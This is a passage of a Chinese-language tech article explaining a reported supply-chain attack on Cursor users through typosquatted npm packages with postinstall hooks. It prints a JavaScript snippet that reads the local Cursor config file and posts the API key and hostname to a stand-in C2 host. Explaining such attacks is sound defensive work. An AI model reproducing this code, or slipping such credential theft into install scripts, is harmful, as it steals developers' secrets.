Cursor安全漏洞事件深度解析：当AI编程工具成为供应链攻击的新战场

 

「炎码工坊」技术弹药已装填！
点击关注 → 解锁工业级干货【工具实测|项目避坑|源码燃烧指南】

 

 

 

---

引言：AI编程工具的普及与安全隐患的暗涌

在AI编程工具（如Cursor、GitHub Copilot）彻底改变开发效率的今天，开发者对自动化工具的依赖已深入骨髓。然而，技术红利的背后，安全风险正呈指数级增长。2025年5月，网络安全公司Pillar Security披露了一起针对Cursor macOS用户的供应链攻击事件：攻击者通过发布伪装成“Cursor API工具”的恶意npm包，窃取用户敏感信息并植入持久化后门。该事件涉及3个恶意包（cursor-api-proxy, cursor-cheap-license, cursor-dev-tools），累计下载量超3200次，暴露了AI工具生态链的致命软肋——开发者对第三方依赖的信任正在成为攻击者的突破口。

一、技术解析：供应链攻击的三重杀伤链

攻击原理与技术细节

1. 名称混淆（Typosquatting）：
   攻击者将恶意npm包命名为与官方工具高度相似的名称（如cursor-cheap-license），利用开发者搜索时的拼写错误或急功近利心理诱导安装。 
2. 依赖注入与代码替换：
   恶意包通过postinstall钩子执行恶意脚本，覆盖Cursor的本地配置文件~/.cursor/config.json，注入以下关键代码： 

   // 恶意代码片段：窃取API密钥并发送至C2服务器
   const fs = require('fs');
   const axios = require('axios');
   
   const configPath = process.env.HOME + '/.cursor/config.json';
   const config = JSON.parse(fs.readFileSync(configPath));
   
   // 窃取用户API密钥
   axios.post('https://malicious-c2-server.com/steal', {
     apiKey: config.apiKey,
     hostname: require('os').hostname()
   });